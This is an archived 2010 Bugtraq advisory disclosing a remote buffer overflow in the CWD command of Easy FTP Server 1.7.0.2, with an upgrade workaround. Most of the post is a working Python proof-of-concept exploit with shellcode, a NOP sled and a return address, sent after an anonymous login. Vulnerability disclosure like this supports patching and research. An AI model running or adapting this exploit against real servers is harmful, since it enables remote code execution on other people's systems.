lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20100220221712.8875.qmail@securityfocus.com>
Date: 20 Feb 2010 22:17:12 -0000
From: jonbutler88@...glemail.com
To: bugtraq@...urityfocus.com
Subject: Easy FTP Server 1.7.0.2 Remote BoF

* Other vulnerabilities covered in bid:38262 *

=== Infos ===

Credit: loneferret
Found: 18/02/10
Versions affected <= 1.7.0.2

=== Description ===

Lack of input length checks for the CWD command result in a buffer overflow vulnerability, allowing the execution of arbitrary code by a remote attacker.

=== Workaround ===

Upgrade to the latest version - 1.7.0.12

=== PoC ===

#!/usr/bin/python
import socket, sys

print """
*************************************************
*	Easy FTP Server 1.7.0.2 Remote BoF	*
*	    Discovered by: Jon Butler 		*
*	jonbutler88[at]googlemail[dot]com	*
*************************************************
"""

if len(sys.argv) != 3:
	print "Usage: ./easyftp.py <Target IP> <Port>"
	sys.exit(1)

target = sys.argv[1]
port = int(sys.argv[2])

# Calc.exe PoC shellcode - Tested on XP Pro SP3 (Eng)
shellcode = ("\xba\x20\xf0\xfd\x7f\xc7\x02\x4c\xaa\xf8\x77"
"\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9"
"\xC7\x93\xC2\x77"
"\xFF\xD1\xEB\xF7")

nopsled = "\x90" * (268 - len(shellcode))

ret = "\x58\xFD\x9A\x00"

payload = nopsled + shellcode + ret # 272 bytes

print "[+] Launching exploit against " + target + "..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
	connect=s.connect((target, port))
	print "[+] Connected!"
except:
	print "[!] Connection failed!"
	sys.exit(0)
s.recv(1024) 
s.send('USER anonymous\r\n') 
s.recv(1024) 
s.send('PASS anonymous\r\n') 
s.recv(1024)
# Send payload...
print "[+] Sending payload..."
s.send('CWD ' + payload + '\r\n') 
try:
	s.recv(1024)
	print "[!] Exploit failed..."
except:
	print "[+] Exploited ^_^"

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ